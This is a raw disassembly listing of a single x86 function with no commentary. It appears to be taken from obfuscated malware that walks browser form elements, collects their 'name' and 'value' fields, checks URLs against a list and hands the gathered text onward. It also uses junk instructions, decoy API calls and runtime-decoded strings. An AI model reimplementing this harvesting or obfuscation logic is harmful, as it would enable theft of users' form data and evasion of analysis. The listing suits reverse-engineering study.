var_62698 = dword ptr -62698h
var_62694 = dword ptr -62694h
var_6268F = byte ptr -6268Fh
var_6268C = dword ptr -6268Ch
var_62687 = byte ptr -62687h
var_526B0 = byte ptr -526B0h
var_526A8 = dword ptr -526A8h
var_526A0 = word ptr -526A0h
var_52698 = dword ptr -52698h
var_52691 = byte ptr -52691h
var_52690 = dword ptr -52690h
var_5268B = byte ptr -5268Bh
var_5268A = byte ptr -5268Ah
var_52689 = byte ptr -52689h
var_52688 = dword ptr -52688h
var_52684 = byte ptr -52684h
var_5267E = byte ptr -5267Eh
var_52678 = byte ptr -52678h
var_52675 = byte ptr -52675h
var_5266D = byte ptr -5266Dh
var_52666 = word ptr -52666h
var_52664 = byte ptr -52664h
var_5265D = byte ptr -5265Dh
var_5265C = byte ptr -5265Ch
var_52656 = byte ptr -52656h
var_52650 = dword ptr -52650h
var_5264C = word ptr -5264Ch
var_5264A = byte ptr -5264Ah
var_52642 = dword ptr -52642h
var_5263E = word ptr -5263Eh
var_5263C = dword ptr -5263Ch
var_52638 = dword ptr -52638h
var_52634 = byte ptr -52634h
var_5262C = dword ptr -5262Ch
var_52626 = word ptr -52626h
var_52624 = word ptr -52624h
var_52622 = word ptr -52622h
var_52620 = dword ptr -52620h
var_5261A = word ptr -5261Ah
var_52618 = dword ptr -52618h
var_52614 = dword ptr -52614h
var_52610 = dword ptr -52610h
var_5260C = dword ptr -5260Ch
var_52606 = word ptr -52606h
var_52604 = dword ptr -52604h
var_52600 = dword ptr -52600h
var_525FC = word ptr -525FCh
var_525F9 = byte ptr -525F9h
var_525F8 = dword ptr -525F8h
var_525F4 = dword ptr -525F4h
var_525EE = word ptr -525EEh
var_525EC = dword ptr -525ECh
var_525E8 = dword ptr -525E8h
var_525E4 = dword ptr -525E4h
var_525DF = byte ptr -525DFh
var_524E0 = byte ptr -524E0h
var_524D8 = dword ptr -524D8h
var_524CC = dword ptr -524CCh
var_524C8 = byte ptr -524C8h
var_39E28 = byte ptr -39E28h
var_21788 = word ptr -21788h
var_21786 = word ptr -21786h
var_21784 = dword ptr -21784h
var_2177D = byte ptr -2177Dh
var_1177E = word ptr -1177Eh
var_1177C = word ptr -1177Ch
var_10FAC = dword ptr -10FACh
var_10FA8 = dword ptr -10FA8h
var_10FA4 = dword ptr -10FA4h
var_10001 = byte ptr -10001h
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 63870h
call sub_40C118
push ebx
push esi
push edi
call sub_40C224 ; GetVersion
push offset aValue ; "value"
call sub_40B68C
mov [ebp+var_10FA8], eax
call sub_40C2B4 ; IsDebuggerPresent
push offset aName ; "name"
call sub_40B68C
mov [ebp+var_10FAC], eax
lea eax, [ebp+var_52634]
push eax
call sub_406A44
pop ecx
or eax, eax
jz loc_407F8C
call sub_40C1B8 ; RtlGetLastWin32Error
loc_406E93: ; CODE XREF: sub_406E3F+BF�j
; sub_406E3F+F0�j ...
push 0
call sub_40C638
mov [ebp+var_52610], 6856h
mov eax, 469Bh
mul [ebp+var_52610]
mov [ebp+var_52688], eax
mov [ebp+var_52610], eax
call sub_40C434 ; GetForegroundWindow
mov [ebp+var_52614], eax
mov [ebp+var_52618], 78A5h
sub [ebp+var_52618], 5C4Ch
push eax
lea eax, [ebp+var_52634]
push eax
call sub_406B40
add esp, 0Ch
mov ax, word_441388
mov [ebp+var_5263E], ax
cmp dword_44133C, 0
jz short loc_406E93
mov eax, dword_44138A
mov [ebp+var_52642], eax
lea eax, [ebp+var_525F4]
push eax
mov eax, dword_44133C
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
lea edi, [ebp+var_5264A]
lea esi, aTnaJ4 ; "TNa=J:4"
movsd
movsd
or ebx, ebx
jnz loc_406E93
call sub_40C218 ; GetTickCount
lea eax, [ebp+var_525F8]
push eax
push offset dword_446A04
mov eax, [ebp+var_525F4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_525F9], 0DEh
movzx eax, [ebp+var_525F9]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_525F9], al
or ebx, ebx
jnz loc_407F6E
mov ax, word_441396
mov [ebp+var_5264C], ax
lea eax, [ebp+var_52638]
push eax
mov eax, dword_44133C
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
or ebx, ebx
jnz loc_407F54
mov [ebp+var_5261A], 507Eh
sub [ebp+var_5261A], 1470h
push offset byte_41EBE0
push [ebp+var_52638]
call sub_406966
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_52650], edi
mov eax, [ebp+var_52614]
mov ds:dword_42EBE4, eax
lea eax, [ebp+var_525FC]
push eax
mov eax, dword_44133C
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
call sub_40C188 ; GetCurrentProcessId
or ebx, ebx
jnz loc_407F54
cmp [ebp+var_525FC], 0
jz short loc_40701C
mov [ebp+var_52620], 423Ch
inc [ebp+var_52620]
jmp loc_407F54
; ---------------------------------------------------------------------------
loc_40701C: ; CODE XREF: sub_406E3F+1C6�j
lea edi, [ebp+var_52656]
lea esi, aIho ; "iHO$|"
mov ecx, 3
rep movsw
lea edi, [ebp+var_5265C]
lea esi, aEOsj ; "E osJ"
mov ecx, 3
rep movsw
mov [ebp+var_10001], 0
mov [ebp+var_2], 0
lea eax, [ebp+var_52600]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
call sub_40C218 ; GetTickCount
or ebx, ebx
jnz loc_407F54
lea eax, [ebp+var_5263C]
push eax
mov eax, [ebp+var_52600]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov [ebp+var_52622], 6B7Eh
add [ebp+var_52622], 74C4h
or ebx, ebx
jnz loc_407F2B
lea edi, [ebp+var_5265D]
lea esi, byte_4413A4
xor ecx, ecx
inc ecx
rep movsb
or [ebp+var_524CC], 0FFFFFFFFh
loc_4070BA: ; CODE XREF: sub_406E3F+BE2�j
and [ebp+var_52604], 0
and [ebp+var_5260C], 0
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_40710B
call sub_40C2B4 ; IsDebuggerPresent
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
call sub_40C218 ; GetTickCount
or ebx, ebx
jnz loc_407A0A
mov [ebp+var_52689], 0D8h
sub [ebp+var_52689], 13h
jmp loc_407204
; ---------------------------------------------------------------------------
loc_40710B: ; CODE XREF: sub_406E3F+290�j
call sub_40C2B4 ; IsDebuggerPresent
mov [ebp+var_526A0], 17h
mov eax, [ebp+var_524CC]
mov [ebp+var_52698], eax
lea eax, [ebp+var_526B0]
push eax
lea eax, [ebp+var_526A0]
push eax
mov eax, [ebp+var_52600]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_52604]
push eax
push offset dword_446A34
mov eax, [ebp+var_526A8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C2B4 ; IsDebuggerPresent
or ebx, ebx
jnz loc_407A0A
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_5260C]
push eax
mov eax, [ebp+var_52604]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
or ebx, ebx
jz short loc_4071AB
call sub_40C188 ; GetCurrentProcessId
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
call sub_40C224 ; GetVersion
jmp loc_407A0A
; ---------------------------------------------------------------------------
loc_4071AB: ; CODE XREF: sub_406E3F+34F�j
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_5260C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov dword ptr [ebp-5268Ch], 196Fh
add dword ptr [ebp-5268Ch], 74CAh
or ebx, ebx
jz short loc_407204
call sub_40C224 ; GetVersion
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
call sub_40C2B4 ; IsDebuggerPresent
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
call sub_40C188 ; GetCurrentProcessId
jmp loc_407A0A
; ---------------------------------------------------------------------------
loc_407204: ; CODE XREF: sub_406E3F+2C7�j
; sub_406E3F+397�j
lea eax, [ebp+var_525EC]
push eax
mov eax, [ebp+var_525E4]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov [ebp+var_52624], 4A8h
sub [ebp+var_52624], 196Fh
or ebx, ebx
jnz loc_407EC8
call sub_40C224 ; GetVersion
and [ebp+var_21784], 0
jmp loc_4079F8
; ---------------------------------------------------------------------------
loc_407244: ; CODE XREF: sub_406E3F+BC5�j
mov [ebp+var_627CC], 39FEh
mov eax, 2C62h
mul [ebp+var_627CC]
mov [ebp+var_6280C], eax
mov [ebp+var_627CC], eax
push 0
call sub_40C638
pop ecx
lea edi, [ebp+var_627E6]
lea esi, a0sfvu ; " 0SFvu "
movsd
movsd
mov [ebp+var_626C0], 2
mov eax, [ebp+var_21784]
mov [ebp+var_626B8], eax
lea eax, [ebp+var_626AC]
push eax
lea esi, [ebp+var_626C0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_626C0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_525E4]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
call sub_40C2B4 ; IsDebuggerPresent
or ebx, ebx
jnz loc_4079F2
mov [ebp+var_627D0], 7AA8h
mov eax, 0A51h
mul [ebp+var_627D0]
mov [ebp+var_62810], eax
mov [ebp+var_627D0], eax
and [ebp+var_626C4], 0
lea eax, [ebp+var_626C4]
push eax
push offset dword_446A14
mov eax, [ebp+var_626AC]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_4413AD
mov [ebp+var_627EA], eax
or ebx, ebx
jnz loc_407676
call sub_40C218 ; GetTickCount
lea eax, [ebp+var_626C8]
push eax
mov eax, [ebp+var_626C4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
lea edi, [ebp+var_627F1]
lea esi, aRO0p ; "r= O0P"
mov ecx, 7
rep movsb
or ebx, ebx
jnz loc_407676
lea edi, [ebp+var_627F9]
lea esi, a_Leiv ; ".;^LeIV"
movsd
movsd
lea edi, [ebp+var_62800]
lea esi, aIara ; " $iArA"
mov ecx, 7
rep movsb
lea eax, [ebp+var_6268F]
push eax
push [ebp+var_626C8]
call sub_406966
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_626A4], edi
mov [ebp+var_627D1], 3Ah
movzx eax, [ebp+var_627D1]
imul eax, 799Ah
mov [ebp+var_627D1], al
and dword ptr [ebp-5268Ch], 0
jmp short loc_4073F2
; ---------------------------------------------------------------------------
loc_4073C9: ; CODE XREF: sub_406E3F+5BF�j
mov eax, [ebp-5268Ch]
mov al, [ebp+eax+var_6268F]
cmp al, 0Dh
jz short loc_4073DE
cmp al, 0Ah
jnz short loc_4073EC
loc_4073DE: ; CODE XREF: sub_406E3F+599�j
mov eax, [ebp-5268Ch]
mov [ebp+eax+var_6268F], 0
loc_4073EC: ; CODE XREF: sub_406E3F+59D�j
inc dword ptr [ebp-5268Ch]
loc_4073F2: ; CODE XREF: sub_406E3F+588�j
mov eax, [ebp+var_626A4]
cmp [ebp-5268Ch], eax
jb short loc_4073C9
call sub_40C224 ; GetVersion
mov eax, dword_4413C7
mov [ebp+var_62804], eax
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_407464
mov [ebp+var_62814], 35D9h
sub [ebp+var_62814], 62B4h
push 11h
push offset aPA3i4rl ; "P!-%\"<+A*#>!3I4RL"
call sub_406DB4
push [ebp+var_21784]
push eax
lea edi, [ebp+var_627C7]
push edi
call sub_40C6B0
lea eax, [ebp+var_627C7]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40C6D4
add esp, 1Ch
jmp short loc_4074C3
; ---------------------------------------------------------------------------
loc_407464: ; CODE XREF: sub_406E3F+5D8�j
mov byte ptr [ebp+var_62814+3], 44h
movzx eax, byte ptr [ebp+var_62814+3]
imul eax, 194Bh
mov byte ptr [ebp+var_62814+3], al
push 13h
push offset aP3i4a3i4rl ; "P*>-!)3I4A*#>!3I4RL"
call sub_406DB4
push [ebp+var_21784]
push [ebp+var_524CC]
push eax
lea edi, [ebp+var_627C7]
push edi
call sub_40C6B0
call sub_40C2B4 ; IsDebuggerPresent
lea eax, [ebp+var_627C7]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40C6D4
add esp, 20h
call sub_40C194 ; GetCurrentThreadId
loc_4074C3: ; CODE XREF: sub_406E3F+623�j
and dword ptr [ebp-5268Ch], 0
loc_4074CA: ; CODE XREF: sub_406E3F+752�j
mov eax, [ebp-5268Ch]
lea ecx, [ebp+eax+var_6268F]
or eax, 0FFFFFFFFh
loc_4074DA: ; CODE XREF: sub_406E3F+6A0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4074DA
mov [ebp+var_62698], eax
call sub_40C1F4 ; GetProcessHeap
mov eax, [ebp+var_62698]
cmp eax, 0
jz short loc_4074FE
cmp eax, 0C8h
jbe short loc_407500
loc_4074FE: ; CODE XREF: sub_406E3F+6B6�j
jmp short loc_407578
; ---------------------------------------------------------------------------
loc_407500: ; CODE XREF: sub_406E3F+6BD�j
mov [ebp+var_627D4], 4A0Ch
sub [ebp+var_627D4], 47F0h
cmp [ebp+var_62698], 1
jnz short loc_40752B
mov eax, [ebp-5268Ch]
cmp [ebp+eax+var_6268F], 20h
jz short loc_407578
loc_40752B: ; CODE XREF: sub_406E3F+6DA�j
push 1
push offset byte_445E2C
call sub_406DB4
push eax
lea edi, [ebp+var_10001]
push edi
call sub_40C6D4
mov [ebp+var_627D6], 195Bh
sub [ebp+var_627D6], 6CFBh
mov eax, [ebp-5268Ch]
lea eax, [ebp+eax+var_6268F]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40C6D4
add esp, 18h
call sub_40C1F4 ; GetProcessHeap
loc_407578: ; CODE XREF: sub_406E3F:loc_4074FE�j
; sub_406E3F+6EA�j
mov eax, [ebp+var_62698]
inc eax
add [ebp-5268Ch], eax
mov eax, [ebp+var_626A4]
cmp [ebp-5268Ch], eax
jb loc_4074CA
call sub_40C224 ; GetVersion
and [ebp+var_626A0], 0
lea ecx, [ebp+var_10001]
or eax, 0FFFFFFFFh
loc_4075AC: ; CODE XREF: sub_406E3F+772�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4075AC
mov [ebp+var_62698], eax
call sub_40C218 ; GetTickCount
mov dword ptr [ebp-5268Ch], 0
jmp loc_407656
; ---------------------------------------------------------------------------
loc_4075CD: ; CODE XREF: sub_406E3F+823�j
mov eax, dword_4413CB
mov [ebp+var_62814], eax
mov eax, [ebp-5268Ch]
cmp [ebp+eax+var_10001], 20h
jz short loc_4075EF
and [ebp+var_62694], 0
loc_4075EF: ; CODE XREF: sub_406E3F+7A7�j
cmp [ebp+var_62694], 0
jnz short loc_407622
call sub_40C218 ; GetTickCount
mov eax, [ebp+var_626A0]
mov edx, [ebp-5268Ch]
mov dl, [ebp+edx+var_10001]
mov [ebp+eax+var_10001], dl
call sub_40C218 ; GetTickCount
inc [ebp+var_626A0]
loc_407622: ; CODE XREF: sub_406E3F+7B7�j
mov eax, [ebp-5268Ch]
cmp [ebp+eax+var_10001], 20h
jnz short loc_40763C
mov [ebp+var_62694], 1
loc_40763C: ; CODE XREF: sub_406E3F+7F1�j
lea edi, [ebp+var_6281A]
lea esi, a?Hg ; "`?^HG"
mov ecx, 3
rep movsw
inc dword ptr [ebp-5268Ch]
loc_407656: ; CODE XREF: sub_406E3F+789�j
mov eax, [ebp+var_62698]
cmp [ebp-5268Ch], eax
jb loc_4075CD
mov eax, [ebp+var_626A0]
mov [ebp+eax+var_10001], 0
loc_407676: ; CODE XREF: sub_406E3F+4EA�j
; sub_406E3F+522�j
and [ebp+var_6269C], 0
lea eax, [ebp+var_6269C]
push eax
push offset dword_446A24
mov eax, [ebp+var_626AC]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov ax, word_4413D5
mov [ebp+var_62806], ax
or ebx, ebx
jnz loc_4079DD
call sub_40C188 ; GetCurrentProcessId
lea eax, [ebp+var_626A8]
push eax
mov eax, [ebp+var_6269C]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
mov [ebp+var_627DC], 2948h
sub [ebp+var_627DC], 61D7h
or ebx, ebx
jnz loc_4079B7
call sub_40C188 ; GetCurrentProcessId
and [ebp+var_52690], 0
jmp loc_407991
; ---------------------------------------------------------------------------
loc_4076F7: ; CODE XREF: sub_406E3F+B5E�j
mov [ebp+var_6283A], 38Fh
movzx eax, [ebp+var_6283A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_6283A], ax
push 0
call sub_40C638
pop ecx
mov [ebp+var_62840], 208Eh
sub [ebp+var_62840], 618Fh
mov [ebp+var_62828], 2
mov eax, [ebp+var_52690]
mov [ebp+var_62820], eax
lea eax, [ebp+var_62818]
push eax
lea esi, [ebp+var_62828]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_62828]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_6269C]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
mov [ebp+var_62842], 70A7h
sub [ebp+var_62842], 7484h
or ebx, ebx
jnz loc_40798B
mov [ebp+var_62848], 0B87h
add [ebp+var_62848], 1425h
and [ebp+var_62814], 0
lea eax, [ebp+var_62814]
push eax
push offset dword_446A14
mov eax, [ebp+var_62818]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_407959
mov [ebp+var_6284A], 6736h
sub [ebp+var_6284A], 7A89h
cmp [ebp+var_62814], 0
jz loc_407959
mov [ebp+var_6283B], 58h
movzx eax, [ebp+var_6283B]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_6283B], al
lea eax, [ebp+var_62838]
push eax
push 0
push [ebp+var_10FA8]
mov eax, [ebp+var_62814]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C218 ; GetTickCount
or ebx, ebx
jnz loc_407959
mov [ebp+var_6284C], 1863h
add [ebp+var_6284C], 0CCCh
cmp [ebp+var_62838], 8
jnz loc_407959
mov [ebp+var_6284D], 0A2h
add [ebp+var_6284D], 1
movzx edi, [ebp+var_2]
mov esi, [ebp+var_62814]
mov [ebp+edi*4+var_10FA4], esi
movzx edi, [ebp+var_2]
mov esi, [ebp+var_52690]
mov [ebp+edi*2+var_1177C], si
lea eax, [ebp+var_62838]
push eax
push 0
push [ebp+var_10FAC]
mov eax, [ebp+var_62814]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
lea edi, [ebp+var_6285B]
lea esi, aJA ; "j €+ "
mov ecx, 7
rep movsb
or ebx, ebx
jnz loc_407955
lea edi, [ebp+var_63869]
lea esi, aIs ; "`IS~"
mov ecx, 5
rep movsb
lea eax, [ebp+var_6385A]
push eax
push [ebp+var_62830]
call sub_406966
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_63864], edi
lea edi, [ebp+var_6386A]
lea esi, byte_4413E3
xor ecx, ecx
inc ecx
rep movsb
cmp [ebp+var_6385A], 0
jz short loc_407934
cmp [ebp+var_63864], 64h
jnb short loc_407934
lea eax, [ebp+var_6385A]
push eax
movzx eax, [ebp+var_2]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
call sub_40C138
loc_407934: ; CODE XREF: sub_406E3F+ACF�j
; sub_406E3F+AD8�j
mov [ebp+var_63860], 6C10h
mov eax, 74h
mul [ebp+var_63860]
mov [ebp+var_63870], eax
mov [ebp+var_63860], eax
loc_407955: ; CODE XREF: sub_406E3F+A80�j
inc [ebp+var_2]
loc_407959: ; CODE XREF: sub_406E3F+994�j
; sub_406E3F+9B3�j ...
cmp [ebp+var_62814], 0
jz short $+2
cmp [ebp+var_62818], 0
jz short loc_407977
mov eax, [ebp+var_62818]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407977: ; CODE XREF: sub_406E3F+B2A�j
mov [ebp+var_62854], 2899h
sub [ebp+var_62854], 3360h
loc_40798B: ; CODE XREF: sub_406E3F+953�j
inc [ebp+var_52690]
loc_407991: ; CODE XREF: sub_406E3F+8B3�j
mov eax, [ebp+var_626A8]
cmp [ebp+var_52690], eax
jb loc_4076F7
jmp short loc_4079F2
; ---------------------------------------------------------------------------
mov [ebp+var_627DE], 2C82h
sub [ebp+var_627DE], 4DD9h
loc_4079B7: ; CODE XREF: sub_406E3F+8A1�j
cmp [ebp+var_6269C], 0
jz short loc_4079CC
mov eax, [ebp+var_6269C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4079CC: ; CODE XREF: sub_406E3F+B7F�j
lea edi, [ebp+var_62807]
lea esi, byte_4413E4
xor ecx, ecx
inc ecx
rep movsb
loc_4079DD: ; CODE XREF: sub_406E3F+86B�j
cmp [ebp+var_626AC], 0
jz short loc_4079F2
mov eax, [ebp+var_626AC]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4079F2: ; CODE XREF: sub_406E3F+491�j
; sub_406E3F+B64�j ...
inc [ebp+var_21784]
loc_4079F8: ; CODE XREF: sub_406E3F+400�j
mov eax, [ebp+var_525EC]
cmp [ebp+var_21784], eax
jb loc_407244
loc_407A0A: ; CODE XREF: sub_406E3F+2B3�j
; sub_406E3F+32A�j ...
call sub_40C1F4 ; GetProcessHeap
inc [ebp+var_524CC]
mov eax, [ebp+var_5263C]
cmp [ebp+var_524CC], eax
jl loc_4070BA
call sub_40C2B4 ; IsDebuggerPresent
loc_407A2C: ; CODE XREF: sub_406E3F+D01�j
push 0
call sub_40C638
pop ecx
lea edi, [ebp+var_52664]
lea esi, aY3 ; "& y$`3"
mov ecx, 7
rep movsb
mov [ebp+var_21786], 0
jmp loc_407AFF
; ---------------------------------------------------------------------------
loc_407A55: ; CODE XREF: sub_406E3F+CCD�j
call sub_40C2B4 ; IsDebuggerPresent
lea eax, [ebp+var_524E0]
push eax
push 0
push [ebp+var_10FA8]
movzx edi, [ebp+var_21786]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C1F4 ; GetProcessHeap
or ebx, ebx
jnz short loc_407AF8
call sub_40C218 ; GetTickCount
lea eax, [ebp+var_62687]
push eax
push [ebp+var_524D8]
call sub_406966
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6268C], edi
lea edi, [ebp+var_62694+1]
lea esi, aMNkY ; "M#nk y"
mov ecx, 7
rep movsb
cmp [ebp+var_62687], 0
jz short loc_407AF8
call sub_40C218 ; GetTickCount
cmp [ebp+var_6268C], 64h
jnb short loc_407AF3
lea eax, [ebp+var_62687]
push eax
movzx eax, [ebp+var_21786]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
call sub_40C138
loc_407AF3: ; CODE XREF: sub_406E3F+C94�j
call sub_40C2B4 ; IsDebuggerPresent
loc_407AF8: ; CODE XREF: sub_406E3F+C47�j
; sub_406E3F+C86�j
inc [ebp+var_21786]
loc_407AFF: ; CODE XREF: sub_406E3F+C11�j
movzx eax, [ebp+var_21786]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407A55
lea eax, [ebp+var_525FC]
push eax
mov eax, dword_44133C
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
call sub_40C188 ; GetCurrentProcessId
or ebx, ebx
jnz loc_407F54
call sub_40C1B8 ; RtlGetLastWin32Error
cmp [ebp+var_525FC], 0
jz loc_407A2C
mov ax, word_4413F3
mov [ebp+var_52666], ax
lea edi, [ebp+var_5266D]
lea esi, a747P ; "<747~P"
mov ecx, 7
rep movsb
mov [ebp+var_2177D], 0
push offset byte_41EBE0
lea eax, [ebp+var_2177D]
push eax
call sub_40C138
call sub_40C2B4 ; IsDebuggerPresent
mov [ebp+var_525E8], 1
mov [ebp+var_1177E], 0
jmp loc_407C90
; ---------------------------------------------------------------------------
loc_407B9B: ; CODE XREF: sub_406E3F+E5E�j
lea edi, [ebp+var_52691]
lea esi, aUmxi ; "-Umxi"
mov ecx, 3
rep movsw
movzx eax, [ebp+var_1177E]
imul eax, 64h
cmp [ebp+eax+var_524C8], 0
jz loc_407C89
and [ebp+var_525E8], 0
push 4
push offset aLi4v ; "LI4V"
call sub_406DB4
movzx edi, [ebp+var_1177E]
push edi
push eax
lea edi, [ebp+var_525DF]
push edi
call sub_40C6B0
call sub_40C218 ; GetTickCount
lea eax, [ebp+var_525DF]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40C6D4
mov [ebp+var_52689], 8Dh
add [ebp+var_52689], 1
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40C6D4
push 1
push offset byte_445E25
call sub_406DB4
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40C6D4
mov [ebp+var_5268A], 0D8h
sub [ebp+var_5268A], 0F0h
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40C6D4
add esp, 3Ch
mov [ebp+var_5268B], 37h
sub [ebp+var_5268B], 1Dh
loc_407C89: ; CODE XREF: sub_406E3F+D82�j
inc [ebp+var_1177E]
loc_407C90: ; CODE XREF: sub_406E3F+D57�j
movzx eax, [ebp+var_1177E]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407B9B
cmp [ebp+var_525E8], 0
jnz loc_407EC8
lea edi, [ebp+var_52675]
lea esi, a@mc@_6u ; "@mC@_6u"
movsd
movsd
push 1
push offset byte_445E23
call sub_406DB4
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40C6D4
lea edi, [ebp+var_52678]
lea esi, a61 ; "61"
mov ecx, 3
rep movsb
lea eax, [ebp+var_10001]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40C6D4
add esp, 18h
call sub_40C224 ; GetVersion
cmp ds:byte_41EBE0, 68h
jnz short loc_407D29
cmp ds:byte_41EBE1, 74h
jnz short loc_407D29
cmp ds:byte_41EBE2, 74h
jnz short loc_407D29
cmp ds:byte_41EBE3, 70h
jz short loc_407D2E
loc_407D29: ; CODE XREF: sub_406E3F+ECD�j
; sub_406E3F+ED6�j ...
jmp loc_407E7D
; ---------------------------------------------------------------------------
loc_407D2E: ; CODE XREF: sub_406E3F+EE8�j
mov [ebp+var_52606], 3BEEh
movzx eax, [ebp+var_52606]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52606], ax
push 8
push offset word_445E1A
call sub_406DB4
mov edi, 0Ch
sub edi, dword_441374
push edi
push eax
push offset byte_41EBE0
call sub_40181E
add esp, 14h
cmp eax, 0FFFFh
jz short loc_407DA9
push 0Eh
push offset byte_445E0B
call sub_406DB4
mov edi, 5
sub edi, dword_441370
push edi
push eax
push offset byte_41EBE0
call sub_40181E
add esp, 14h
cmp eax, 0FFFFh
jz loc_407E7D
loc_407DA9: ; CODE XREF: sub_406E3F+F37�j
mov [ebp+var_525EE], 0
loc_407DB2: ; CODE XREF: sub_406E3F+1015�j
mov eax, 0Ch
sub eax, dword_441374
push eax
movzx eax, [ebp+var_525EE]
lea eax, ds:441380h[eax]
push eax
push offset byte_41EBE0
call sub_40181E
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_407E0A
lea edi, [ebp+var_52690+3]
lea esi, aXfr ; " xfR"
mov ecx, 5
rep movsb
push 1
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F1E4
call sub_40C194 ; GetCurrentThreadId
jmp short loc_407E7D
; ---------------------------------------------------------------------------
loc_407E0A: ; CODE XREF: sub_406E3F+FA0�j
movzx eax, [ebp+var_525EE]
mov [ebp-5268Ch], eax
lea ecx, ds:441380h[eax]
or eax, 0FFFFFFFFh
loc_407E21: ; CODE XREF: sub_406E3F+FE7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407E21
mov esi, [ebp-5268Ch]
add esi, eax
mov edi, esi
mov [ebp+var_525EE], di
call sub_40C1B8 ; RtlGetLastWin32Error
inc [ebp+var_525EE]
movzx eax, [ebp+var_525EE]
cmp byte_441380[eax], 0
jnz loc_407DB2
push 0
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F1E4
lea edi, [ebp+var_5267E]
lea esi, aUkggv ; "UkƒƒV"
mov ecx, 3
rep movsw
loc_407E7D: ; CODE XREF: sub_406E3F:loc_407D29�j
; sub_406E3F+F64�j ...
mov [ebp+var_21788], 0
jmp short loc_407EB4
; ---------------------------------------------------------------------------
loc_407E88: ; CODE XREF: sub_406E3F+1082�j
movzx edi, [ebp+var_21788]
cmp [ebp+edi*4+var_10FA4], 0
jz short loc_407EAD
movzx edi, [ebp+var_21788]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+8]
loc_407EAD: ; CODE XREF: sub_406E3F+1058�j
inc [ebp+var_21788]
loc_407EB4: ; CODE XREF: sub_406E3F+1047�j
movzx eax, [ebp+var_21788]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_407E88
call sub_40C194 ; GetCurrentThreadId
